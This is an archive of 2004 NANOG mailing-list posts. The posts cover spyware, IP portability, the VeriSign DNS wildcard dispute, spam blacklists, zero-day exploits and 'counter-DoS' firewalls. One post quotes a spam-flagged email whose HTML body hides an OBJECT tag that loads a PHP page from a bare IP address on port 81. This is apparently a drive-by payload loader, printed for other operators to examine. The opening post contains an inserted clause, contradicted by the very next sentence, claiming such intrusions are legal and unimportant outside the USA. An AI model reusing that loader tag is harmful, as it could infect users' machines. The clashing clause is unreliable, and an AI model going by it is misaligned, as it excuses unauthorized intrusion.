think that's the case here. It would be a poor business decision not to, and these people are definetly out to make as much money as they can off of these exploits. This is 100% legal at this point (and even if it is not legal, who bored about it outside of USA? No anyone!). It really shouldn't be legal. It is someone gaining unauthorized access to computer systems and altering data on those machines. Not to mention that people are profiting from these intrusions. -Brian
RE: Spyware becomes increasingly malicious
William Warren wrote: not all the variants are that easy..how about doing a google on coolwebsearch..scumware.com has a good writeup as well as spywareinfo.com...the newer variants are not that easy I second that. The version I saw required a third party registry editor and booting up into the recovery console from an XP cd (safe mode didn't cut it) just to remove a hidden dll. Had it not been for the forums out there at http://forums.spywareinfo.com and the cwsshredder, which got most, but not all, of the cruft installed by this piece of bastard software, my grandmother's computer would still be popping up those tens of pages of garbage randomly. The authors of these coolwebsearch variants are extremely intelligent programmers with far more understanding of the bowels of the windows platform than your average script kiddies. If you get hit with the version I saw, it's no 10 minute piece of cake. What I don't understand is how exploiting bugs in a program (internet explorer) to install software without the consent or even acknowledgement from the owner/user is legal behavior. To me, it's just like someone abusing a bug in bind, and installing a rootkit, which last time I checked, could end up getting someone in legal troubles. For another hastily-thought-out analogy, it's like someone breaking into your house and reprogramming your cable box to keep changing the channel to the home shopping club every 30 seconds. -Brian
RE: (UPDATE) Can a Customer take their IP's with them? (Court says yes!)
On Tue, 29 Jun 2004, David Schwartz wrote: : : : What I AM looking for is a commentary from the internet community, : strictly relating to the fact that a judge has issued a TRO that forces an : ISP (NAC) to allow a third-party, who WILL NOT be a Customer of NAC, to be : able to use IP Space allocated to NAC. In other words, I am asking people : to if they agree with my position, lawsuit or not, that non-portable IP's : should not be portable between parties, especially by a state superior : court ordered TRO. : : It is at least my opinion that this is a ludicrous argument. While this :would certainly cause problems if everyone did it and it isn't the norm, :it's ridiculous to argue that there could never exist a situation where this :might not be the best temporary solution to a legitimate dispute between :parties. : : Consider, for example, if I'm a large customer single-homed to one ISP. :They go out of business and can't continue to provide me with service with :four hours notice. Consider Randy's ealier recollection, which many should also recall. In the context of the currently publicly available documents, any further discussion is less than operationally relevant. cheers, brian
Re: Attn MCI/UUNet - Massive abuse from your network
Is it possible for some people to chime in on backbone scaling issues that have a linksys cable modem router to test on? On Thu, 24 Jun 2004, Robert E. Seastrom wrote: Dr. Jeffrey Race [EMAIL PROTECTED] writes: Poof! MCI spam problem goes away in 30 days. http://www.rhyolite.com/anti-spam/you-might-be.html I think the discussion is over. ---Rob
Re: Verisign vs. ICANN
Title: Re: Verisign vs. ICANN Stephen J. Wilcox (SJW) wrote: SJW I do not believe there is any technical spec prohibiting this, SJW in fact that DNS can use a wildcard at any level is what enables SJW the facility. It is not always the case that everything a spec defines, is included or enumerated in the spec, particularly when specs refer to other specs and it is the combination(s) of specs which define proper behaviour. (If every protocol which was built on TCP, had to also include the contents of the TCP spec, the whole RFC system would quicly collapse under its own weight.) SJW I think this is a non-technical argument.. SJW altho it was demonstrated that owing to the age and status of the com/net SJW zones a number of systems are now in operation which make SJW assumptions about the response in the event of the domain not existing... If it were merely an *internal* issue *within* the DNS system, perhaps there would be areas of disagreement which could be settled via either extending, or clarifying, the relevant RFCs. However, the issue is, to some degree, actually outside of the proper scope of the DNS lookup/resolver system. (see below...) On Sat, 19 Jun 2004, Alexei Roudnev (AR) wrote: AR The technical roots of the problem are: proposed services VIOLATES AR internet specification (which is 100% clean - if name do not exist, AR resolver must receive negative response). AR So, technically, there is not any ground for SiteFinder - vice versa To make Alexei's argument's syntax agree with the intended semantics: He means to say, Technically, there is no grounds for implementing SiteFinder by means of inserting wildcards to the .com and .net zones. Rather, there are specific grounds for *not* inserting wildcards, regardless of the purpose of those wildcards, in .net and .com zones. (E.g.: in contrast with .museum zone, which is generally special-purpose, and for which assumptions about which services are expected (www only) are reasonable and valid, the .com and .net zone are general-purpose, and pretty much any service, including all assigned values for TCP and UDP ports from the IANA, should and must be presumed to be used across the collection of IPv4 space.) The crux of the problem appears in a particular case, for which *no* workaround exists, and for which no workaround *can* exist, from a straight derivational logic of state-machine origins. The DNS *resolver* system, is only one of the places where the global namespaces is *implemented*. Any assigned DNS name *may* be placed into the DNS. And *only* the owner of that name has authority to register that name, or cause its value to return from any query. An assigned name, however, can *also*, or even *instead* of being placed into the DNS *resolver* system, be put into other systems for resolving and returning name-address mappings. These include: the predecessor to BIND, which is the archaic /etc/hosts file(s) on systems; Sun's NIS or NIS+ systems (local to any NIS/NIS+ domain space); LDAP and similar systems; X.500 (if this is by any chance distinct from LDAP - I'm no expert on either); and any other arbitrary system for implementing name-address lookups. And the primary reason for *REQUIRING* NXDOMAIN results in DNS, is that in any host system which queries multiple sources, only a negative response on a lookup will allow the search to continue to the next system in the search order. Implementing root-zone wildcards, places restrictions on both search-order, and content population, of respective name-resolution systems, which violates any combination of RFCs and best-common practices. And, most importantly, *cannot* be worked around, *period*. Until the RFCs are extended to permit population of zones with authoritative *negative* information, and all the servers and resolvers implement support for such, *and* operators of root zone databases automatically populate assigned zones with such negative values, wildcards *will* break, in unreconcileable fashion, existing, deployed systems which refer to multiple implementations of zone information services, and for which *no* workaround is possible. Apologies for a long, semi-on-topic post. Hopefully this will end this thread, and maybe even put a stake through the heart of the VeriSign filing (at least this version of it). While the law generally doesn't recognize mathematically excluded things as a matter of law, when it comes to affirmative testimony, counter-arguments can demonstrably be shown as de-facto purgury (sp?). Brian Dickson (who has had to deploy systems in heterogeneous environments, and is aware of deployed systems that broke because of *.com)
Re: Akamai an Inside Job?
At 08:23 AM 6/16/2004, David Kennedy CISSP wrote: http://www.overclockersclub.com/?read=8733819 The Akamai attacks started in the morning and it was detected by Keynote Systems, a web tracking company that is able to track the load and bandwidth on the Internet. According to Keynote they saw an Internet performance issue this morning Keynote's primary business model is measuring the performance and availability of public web sites as seen from a distributed network of synthetic probes. They don't offer any services that track the load and bandwidth on the Internet. Here's what their public/PR type email alert said on the matter yesterday: Keynote Internet Performance Alert Starting at approximately 5:30am PDT today, a major Internet performance issue was detected by Keynote systems. By 6:00am, the availability of the Keynote Business 40 Internet Performance Index had dropped from its usual near-100% availability to 81% availability: http://keynote.lyris.net/t/4086/732513/23/0/http://web507.keynote.com/mykeynote/Post/KB40data_061504_085844.asp Further analysis by Keynote indicated that the availability issues were limited to several large sites, all of whom outsource their DNS services to Akamai. These sites dropped to near-zero availability: http://keynote.lyris.net/t/4086/732513/24/0/http://web507.keynote.com/mykeynote/Post/KB40data_061504_090509.asp Availability was largely restored by approximately 7:45am PDT. ... They have tracked the attacker back to person that is at the Akamai Technologies ISP. No other information has been given to us at this time. We do not know if the FBI is working on this issue right now, but we expect them to do so. [DMK: Source, beyond overclockers, unknown, reliability and accuracy unknown.] That's nonsense David. Keynote measurements can distinguish between availability problems caused by DNS outages versus those caused by connectivity or site outages. They manifestly don't track attackers. Brian Mulvaney
[OT] common list sense (Re: Even you can be hacked)
Title: [OT] common list sense (Re: Even you can be hacked) Paul Jamka [PJ] wrote: On Thu, 10 Jun 2004, Laurence F. Sheldon, Jr. [LFSJ] wrote: LFSJ I'm on the list folks, if you send it to the list I'll get it. I don't need a copy to the list and Cc:'s until the end of time. PJ Then set a Reply-To. Pretty simple. In case no one else bothered to point this out: Not everyone who *posts* to NANOG *reads* nanog via email. For example, I read it via the web archive. For those like us, any presumption about replies to the list being read by us, would be incorrect. And since no one necessarily knows the current subscription status of everyone else, it actually makes sense to copy both the sender and the list. As Randy [Bush, of course] points out, if you don't like duplicate mail, you are free to use some kind of filter. (Please don't bother replying. I am just attempting to get in the last blow before the equine perishes.) Brian
RE: Barracuda Networks Spam Firewall
Title: RE: Barracuda Networks Spam Firewall Eric, There's one rule that will wipe out ~90% of spam, but nobody seems to have written it yet. if URL IP addr is in China then score=100 support for a generic lookup list of cidr blocks would get another 9% I agree that geographically classifying the URL's embedded in the spams would be pretty slick, using the china.blackholes.us and cn-kr.blackholes.us RBLs has been pretty effective at reducing our spamload, as a supplement to the standard lookup services. They do not descriminate between legit mails and spam mails from china. Everything from those IP blocks gets classified as spam. Luckily we don't ever get any client emails from those countries at this point and can use these filters without worrying about false-positives. (I think the doubleclick.blackholes.us is pretty funny too) There are others at: http://www.blackholes.us/ Is anyone else out there using these blackholes? I wonder how often they get updated. Brian Battle Confluence
RE: Network discovery tools
The best GPL tool that I've come across in a long while, as far as network discovery goes, would have to be the discovery engine inside Netdisco (http://www.netdisco.org). This tool is fairly Cisco-centric, but Max has put a lot of work into a tool for folks who are tired of CiscoWorks not working. -B -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Thursday, May 06, 2004 11:13 AM To: [EMAIL PROTECTED] Subject: Network discovery tools I was wondering if anyone could recommend a good shareware or demo network discovery tool. I was hoping to find something that will show vendor type during node discovery. I came across a tool called network ferret that did the job, but nothing downloadable. I'm hoping to do some more work on the effects of network diversity, and wanted to do testing on real world networks. I figured starting of with GMU would get us going, but if anyone knows of any available datasets with node-link topology and vendor type it would be great to play with them. thanks, sean
Re: Mexico City Internet Bandwidth suggestions
Paul, If we were to take a rough poll, which one of the two, Alestra or Avantel, would get the prize for highest uptime/availability? Sorry for the delay. I installed the network as a consultant 3 or so years ago.My client's Operations staff have been extremely competent in handling it since then, so I haven't had to be involved since then. I've asked them for their input, and this is their response ... Alestra has better uptime and is better for national (Mexico) routes. Avantel has better international (especially USA) routes. Hope that helps, Brian
Re: Mexico City Internet Bandwidth suggestions
I was curious if anyone could share any suggestions and experiences with providers of internet bandwidth ranging from T1 to OC3 in Mexico City. Telmex is the obvious in-house Mexico monopoly, but was wondering if there were any other legitimate, competitive providers in the game over there. Alestra (affiliated in some way with ATT), and Avantel (affiliated in some way with Worldcom) gave us reasonable pricing (reasonable for Mexico City anyway) on E3/T3 solutions. A couple years ago they were peered with Telmex in Monterrey I think, which was acceptable given the difference in pricing (Telmex and GBLX were both *much* costlier). We got an uplink to both and run bgp. It's been fairly solid. When one's down, the other's up :) Brian
Re: Microsoft XP SP2 (was Re: Lazy network operators - NOT)
At Mon, Apr 19, 2004 at 06:12:16AM -0400, Chris Brenton wrote: Key word here is essentially. I've been involved with about a half dozen compromises that have been true zero days. Granted that's less than ground noise compared to what we are seeing today. There're a lot more 0-days than that. They just tend to remain within a smaller community (typically the ones who discover it) and are used carefully/intelligently for compromises, often for a very long time. Then it gets leaked by someone and released into the wild/script kiddie community or someone else discovers it... (more for benefit of others than a response to you) Also, don't underestimate a person's ability to shoot themselves in the foot. Windows 2003 server, out of the box, is technically one of the most secure operating systems out there because it ships with no open listening ports. Based on the auditing I've done however, it ends up being deployed even less secure than 2000 because a lot of admins end up doing the turn everything on to get it working thing. An uneducated end user is not something you can fix with a service pack. Agreed, and even conscientious users screw up. I did this some months ago when installing MS SQL Server Desktop Engine from a third-party CD (packaged with software). This was well after the whole Slammer affair, memories fade and I didn't stop to realize they used the same codebase (oops) - bri
Re: Microsoft XP SP2 (was Re: Lazy network operators - NOT)
At Mon, Apr 19, 2004 at 08:22:48AM -0400, Chris Brenton wrote: Agreed. I think part of what makes 0-day easier to hide *is* the raw quantity of preventable exploits that are taking place. In many ways we have become numb to compromises so that the first response ends up being format and start over. If 0-day was a higher percentage, it would be easier to catch them when they occur and do a proper forensic analysis. Right, they fit in with the noise. RANT I guess I have a hard time blaming this type of thing on the end user. Part of the fall out from making computers easier to use, is making it easier for end users to shoot themselves in the foot. One of the benefits of complexity is that it forces end user education. I'm guessing that if you had to load SQL as a dependency you would have caught your mistake before you made it. Let me give you an example of the easy to use interface thing. Back in 2000 I made it a personal goal to try and get the top 5 SMURF amplifier sites shut down. I did some research to figure out what net blocks were being used and started contacting the admins. Imagine my surprise when I found out that 3 of the 5 _had_ a firewall. They had clicked their way though configuring Firewall-1, didn't know they needed to tweak the default property settings, and were letting through all ICMP unrestricted and unlogged. IMHO its only getting worse. I teach a lot of perimeter security folks and it seems like more and more of them are moving up the ranks without ever seeing a command prompt. I actually had one guy argue that everything in Windows is point and click and if you could not use a mouse to do something, it was not worth doing. Again, I don't see this as an end user problem because as an industry we've tried to make security seem easier than it actually is. We want to make it like driving a car when its more like flying an airplane. That's pretty sad, I can forgive users, but nobody doing 'security' should be living in a pure GUI world, to extend your analogy it would be like only knowing how to configure the autopilot and getting a pilot's license. As far as mainstream users.. * Software needs to patch itself, users aren't going to do it. * Software needs to be intuitive, people interact with computers as if they were doing 'real' things. Things like cut and paste are easy because they make sense... * Software patches need to WORK and not screw up Joe User's system, believe me they won't understand that software is never bug-free, they'll instead swear off installing patches in future. * Software needs reasonable defaults.. this doesn't necessarily mean turning every feature off. * Wizards and/or a choice of 'starter' confs can be great.
Re: Microsoft XP SP2 (was Re: Lazy network operators - NOT)
At Mon, Apr 19, 2004 at 11:22:17PM +1000, Gregh wrote: I would love to know the average age of the list inhabitants. 22 It has been my observation that things which are new become better known when a generation has grown up, completely, with it and is teaching the next generation. Until that occurs, you are going to get one heck of a larger lot of uninformed users because they are not only young and clueless but every other age and clueless. Worse, they are clueless in a lot of cases because they are frightened by new technology. Eventually, it will become as common as a car on the road and at that point, taking obvious steps wont even be a topic for discussion any longer. Of course you're right, but this isn't going to happen for a long time.. and besides.. there are a lot of people in my generation that are not that tech-savvy at all.. I'd say the top uses are Games, IM/blogs/etc and P2P None of these really have anything to do with being good guardians of the net. Of course in the long-run you'll prove me wrong.. but I think it'll take a fair while yet.. anyway, i just hope we'll have made good progress on other fronts. - bri
Re: Strange message possibly through nanog mail server
On Wednesday, March 17, 2004 5:57 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote: I Just received this. I would like to check if others have received it and did it indeed come through nanog mailist: Date: Wed, 17 Mar 2004 21:10:38 + From: Deep Throat [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Spamhaus Exposed Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ ___ And while the website was unavailable and the sender is being anonymous (whichis against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something through this mail list, which makes me think it might have come through merit mail machine but not actually though mail list). What I find even more disturbing is that ip address listed as origin (which may well have been forged if they managed to gain some highier level access to merit servers) is that of US Military. Below is the header for your review. I do however find it slightly more likely that its some kind of sophisticated joe-job on spamhaus and that info is forged but they may have used some bug on merit mail software. I got it to. Let me throw some insight into this - notice the To line: To: [EMAIL PROTECTED] IIRC, thats Peter Schroebel, aka SMS Online. Peter has it out for Steve Linford of SpamHaus because SMS Online is listed for hosting spammers. He claims that SpamHaus wanted $10k from him to be removed. Peter tried to bribe the AHBL a few weeks ago to get us to remove him from our system. Peter likes to gloat about all the connections he has, and how powerful he is (though I have yet to see proof of this). So, I'm not exactly sure what to make of this... It could be Peter, and the mirror of the page I've seen certainly makes it look like something he'd write. But, could be a joe job too. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Request response
Erm, something is definately up tonight. Message is below, for those of you who didn't want to touch this message. I can't get to the site listed in the message, so I have no idea what its trying to deliver exactly. Anyone care to comment? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org Return-path: [EMAIL PROTECTED] Envelope-to: [EMAIL PROTECTED] Delivery-date: Wed, 17 Mar 2004 21:41:31 -0500 Received: from trapdoor.merit.edu ([198.108.1.26] ident=postfix) by mail.sosdg.org with esmtp (Exim 4.30) id 1B3nTO-00021v-N6; Wed, 17 Mar 2004 21:41:30 -0500 Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:43 -0500 (EST) Date: Thu, 18 Mar 2004 13:40:35 +1000 To: [EMAIL PROTECTED] From: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600. X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600. Sender: [EMAIL PROTECTED] Precedence: bulk Errors-To: [EMAIL PROTECTED] X-Loop: nanog X-Scan-Signature: 0642888b67059a54bfdd4dcbc5a4659b X-SA-Exim-Connect-IP: 198.108.1.26 X-SA-Exim-Mail-From: [EMAIL PROTECTED] Subject: Request response Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on everest.sosdg.org X-Spam-Level: *** X-Spam-Status: No, hits=7.0 required=9.0 tests=BAYES_01,DCC_CHECK, FORGED_MUA_OUTLOOK,FORGED_OUTLOOK_TAGS,HTML_MESSAGE,MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,NO_REAL_NAME,WEIRD_PORT autolearn=no version=2.63 X-Spam-Report: * 0.2 NO_REAL_NAME From: does not include a real name * -1.5 BAYES_01 BODY: Bayesian spam probability is 1 to 10% * [score: 0.0600] * 0.1 HTML_MESSAGE BODY: HTML included in message * 0.3 MIME_HTML_ONLY BODY: Message only has text/html MIME parts * 0.1 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL * 1.4 WEIRD_PORT URI: Uses non-standard port number for HTTP * 2.9 DCC_CHECK Listed in DCC (http://rhyolite.com/anti-spam/dcc/) * 1.0 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format * 2.6 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook X-SA-Exim-Version: 4.0 (built Tue, 16 Mar 2004 14:56:42 -0500) X-SA-Exim-Scanned: Yes (on mail.sosdg.org) Status: htmlbody font face=System OBJECT STYLE=display:none DATA=http://24.84.218.164:81/641280.php; /OBJECT/body/html
Wiltel Contact
Can someone from Wiltel contact me offlist please. Brian Boles [EMAIL PROTECTED]
Re: Packet Kiddies Invade NANOG
On Monday, March 15, 2004 1:11 PM [EST], John Harold [EMAIL PROTECTED] wrote: Yes, Gregory Taylor aka OseK is a perfect gentlemen now. Here are logs from Feb 4th 2004 showing him being a perfect gentlemen... You know how easy it is to fake IRC logs? (16:12:01) #nanog!jh I l33t hax0red y0uz! (16:12:30) #nanaog!skrptkd No, I l33t hax0red y0uz first! and on and on, I don't know why you people seem to think I'm involved with all of this stuff. If you want to show evidence, do it offlist and among yourselves, because I don't think people give a crap about your little spats between one another - especially not based on IRC logs. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Cisco's Website down?
On Mon, March 15, 2004 3:21 pm, [EMAIL PROTECTED] said: Anyone else seeing an error getting to www.cisco.com? Yep, from AOL, level3, and RoadRunner. All coming back as 403. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
RE: Cisco website www.cisco.com 403 forbidden?
On Mon, March 15, 2004 3:41 pm, Todd Mitchell - lists said: | Behalf Of Jay Hennigan | Sent: March 15, 2004 3:19 PM | | Is it just me that they don't like? All fixed now, but load times are hella slow: Probably a million other people just discovered it was back up as well. I know alot of users that will just sit there, hitting refresh over and over again until the site finally comes up, instead of just going to do something else and coming back later. Then, when it finally comes back up, you have a million users who are hitting refresh over and over again because the site is slow, creating even more load, and you get the picture. :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: www.sunfreeware.com down too?
On Mon, March 15, 2004 3:51 pm, Jon R. Kibler said: Have noticed several sites down today. Can't seem to get to www.sunfreeware.com as well as Cisco. Works fine here. Possibly some flapping going on somewhere? I just logged into several routers and checked, I see nothing entirely out of the ordinary, but I don't have the most wide view of the Internet from these routers. It could also be DoS attacks too. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Cisco's Website down?
On Monday, March 15, 2004 6:01 PM [EST], Stephen J. Wilcox [EMAIL PROTECTED] wrote: Anyone else seeing an error getting to www.cisco.com? Yep, from AOL, level3, and RoadRunner. All coming back as 403. You expected the webserver to react differently depending on how your packets got there? Steve Possibly multiple web servers, each handling different areas, in some sort of a cluster? Its not unheard of. I used to have a system like that for one of my customers - based on where the traffic was coming from, the front end server which routed the connections to the various backend web servers, which would serve up slightly different data. Someone comes from RU, send them to a specific server which handles content for russia, and so on. 403 means permission denied, correct? Also could mean that its got the IP range you are coming from blacklisted. (Try visiting the Blars BL homepage from a blacklisted IP address, and you'll see what I mean). When trying to figure out where a problem is, sometimes its good to try from multiple locations regardless, even if it seems to be a problem specifically with the server itself. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: who offers cheap (personal) 1U colo?
On Sunday, March 14, 2004 4:58 PM [EST], Janet Sullivan [EMAIL PROTECTED] wrote: My cable modem provider filters port 25, so I can't run my own SMTP server. Their mail servers suck. Yes, I could pay for a business class cable modem connection and they'd unblock the port... but I'd likely still be filtered. Guess who is having a dedicated 1U set up right now? ;-) I think Paul is right, there is a small niche market for this. Hm, are there companies out there that offer outbound SMTP services (for people who are blocked, or which need a mail server thats not blacklisted because their provider isn't dealing with spam problems)? I never really looked into too much, but I haven't seen it offered on provider's sites outright. I was considering setting up a service like this (we have 2-3 outbound mail relay servers that are sitting idle because we don't need them yet), but wasn't sure how interested people would be. Like, say, setup a service that offers people the ability to send outbound mail through based on IP ACLs, possibly SMTP AUTH, TLS/SSL certs, and other things which could authenticate the sender, and have it accept SMTP on various other non-25 ports. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
RE: who offers cheap (personal) 1U colo?
On Sun, March 14, 2004 5:45 pm, Vivien M. said: Have you been looking at providers in the right industry? Such services are usually offered as addons by people who sell DNS services (especially dynamic DNS) and other such things designed to make it easier for people to run their own servers. They do exist, and as was pointed out earlier in this discussion, cost much less than the 1U colo alternative. We do it, and I know at least one or two others in our industry do... I have actually. I see an awful lot of services for incoming SMTP filtering of spam/viruses, or just to hold the mail while you are offline, but haven't seen outgoing SMTP services - which is why I asked :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: Counter DoS
On Thursday, March 11, 2004 2:43 AM [EST], Jay Hennigan [EMAIL PROTECTED] wrote: On the other hand, they could become immensely popular, reaching the critical mass when one of them detects what is interpreted as an attack from a network protected by another. Grab the popcorn and watch as they all bludgeon each other to death. :-) Sounds like efnet channel wars on a much more interesting scale. Like I've said in previous posts - do we really want these people having tools like this? Doesn't this make them the equivelant of 'script kiddies'? How the hell could a company put something like this out, and expect not to get themselves sued to the moon and back when it fires a shot at an innocent party? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Counter DoS
On Thursday, March 11, 2004 3:05 AM [EST], Brian Bruns [EMAIL PROTECTED] wrote: Sounds like efnet channel wars on a much more interesting scale. Like I've said in previous posts - do we really want these people having tools like this? Doesn't this make them the equivelant of 'script kiddies'? How the hell could a company put something like this out, and expect not to get themselves sued to the moon and back when it fires a shot at an innocent party? I hit send way to fast, heh. Whats going to happen when they find a nice little exploit in these buggers (even if they have anti-spoof stuff in them) that allows the kids to take control of them or trick them into attacking innocents? Instead of thousands of DDoS drones on DSL and cable modems, you'll see kids with hundreds of these 'nuclear stike firewalls' on T1s, T3s, and higher, using them like they use the current trojans? No product is 100% secure (especially not something that runs under Windows, but thats another issue), so how are they going to deliver updates? Or make sure that the thing is configured right? I could see blacklists (BGP based) cropping up of these systems, so that you can filter these networks from ever being able to come near your network. This is starting to sound more and more like a nuclear arms race - on one side we have company a, on the other company b. Company A fears that B will attack it, so they get this super dooper nuclear strike system. Company B follows suit and sets one up as well. Both then increase their bandwidth, outdoing the other until finally, script kiddie comes along, and spoofs a packet from A to B, and B attacks A, and A responds with its own attack. ISPs hosting the companies fall flat on their face from the attack, the backbone between the two ISPs gets lagged to death, and stuff starts griding to a halt for others caught in the crossfire. So, and who thinks that this is a good idea? :) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Counter DoS
On Thursday, March 11, 2004 6:16 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote: Which RBL operators flood /24's or /16's? What do they flood them with? I think he meant that RBLs sometimes include entire /24 in RBL list when only one or two ips are at fault and some would go even highier to include entire ISP allocation. This is probably talking about SPEWs and alike RBLs That usually only happens when providers ignore abuse reports and don't do something about their abusive customers. Thats how we do it at the AHBL - you ignore abuse reports for long enough and pretend like the problem doesn't exist, you get a /24 listed. You move the spammer to another block, inside your network, and it grows to encompass the new block as well as the old one. And it keeps going from there. Thats how the rima-tde blocks that are in the AHBL got started - single /32s, then as the spam and 419 scams came in faster, it expanded to /24s, and finally after 2 dozen or so /24s blocked, I started going for /20s and larger. Now I've got two /13s, and a /16 of theirs blocked until Telefonica decides to contact us and discuss the situation with the abuse coming from their network. When providers dont act on abuse, you have to put the pressure on. Sometimes, that means forcing their legit customers to start to complain and thow a fit with their provider over the blocks. Yes, its ugly and unfair, but thats the only way to get them to act. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: wholesalebandwidth.com major sponsor of spammers refuses to accept email at abuse
On Thursday, March 11, 2004 10:11 PM [EST], Henry Linneweh [EMAIL PROTECTED] wrote: I have received almost 200 different spam messages from domains hosted by this provider from russain domains attempting to sell pharmacueticals and other unsolicited services that I do not want tekmailer.com and moosq.com are 2 of the primary abusers from this hosting company -Henry Message from yahoo.com. Unable to deliver message to the following address(es). [EMAIL PROTECTED]: 69.6.21.60 does not like recipient. Remote host said: 550 5.7.1 [EMAIL PROTECTED]... Relaying denied Giving up on 69.6.21.60. Wholesalebandwidth is just a front-end for spammers. I've had them blacklisted for a long time with no ill affects (and alot less spam). -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Need a cox.net mail server contact
Hello all, If a cox.net mail admin, or someone who knows a cox.net mail admin could contact me offlist about them blocking 2mbit.com in their mail servers, that would be great. I've tried contacting their [EMAIL PROTECTED] with UNBLOCK in the subject, but it just bounces the mail back at me with the same error as if I was trying to contact one of their users. Sooo, you kinda see the issue. Thanks -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Need a cox.net mail server contact
On Thursday, March 11, 2004 1:19 AM [EST], Gregory Taylor [EMAIL PROTECTED] wrote: The IP that 2mbit.com inhabits is on a Road Runner commercial block, which is allocated for small to mid-sized businesses. There is no reason for commercial cable networks to be blocked under the same pretenses that consumer cable networks are blocked. Just my 2 cents Its the domain specificly. Not the IP. I can send to cox.net using one of my other dozen domain names from our IPs directly without a block. But, no matter where I try 2mbit.com from, its blocked. I suspect it has something to do with the 'fix' I was told by cox.net that was in place to prevent them from DoSing our mail servers with bounces. Rather then actually fixing their mail servers, just block my domain so that the joe job doesn't cause bounces in the first place. How nice of them eh? Guess my cox.net mail server blacklist entry in the AHBL during the attack didn't get the message through. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Information Warfare
On Saturday, March 06, 2004 4:46 AM [EST], william(at)elan.net [EMAIL PROTECTED] wrote: Here is a quote from their press-release I especially like: ... Symbiot has introduced the first and only tool that intelligently and accurately responds to hostile attacks against enterprise networks, said Richard Forno, former chief security officer for Network Solutions, and a noted information warfare specialist. While other companies offer only passive defense barriers, Symbiot provides the equivalent of an active missile defense system ... Lovely. So not only do we now have to fend off attacks from script kiddies and packet monkies, we now have to fend off attacks from idiot sysadmins who set this tool up and allow it to go all out on supposed 'attacks' against their systems. I'll share my favorite goober with firewall story.When I was a sysadmin/netadmin at a large ISP, I used to get these 'attack' reports from clueless users all the time. I could identify which tool they used just by how the body of the message looked and how the 'attack' was described. Got ones saying that my performance testing server (which sometimes did ping scans across the dialups to see what the general response time was) was 'attacking' the user's machine with a single ICMP echo. Or how our IRC server was trying to attack the user on the ident port every time they tried to connect. Of course, the best one was when a supposed 'security expert' called up and complained how my two caching DNS servers for the T1 customers was attacking his entire network on port 53 UDP. He had naturally filtered the 'attack' because it was obvious that our Linux DNS servers were infected with one of the latest Windows viruses going around, and suddenly noone on his network could browse the web anymore. So, let me ask the question, do we really want people like that having a tool which autoresponds to attacks with attacks? At least when he 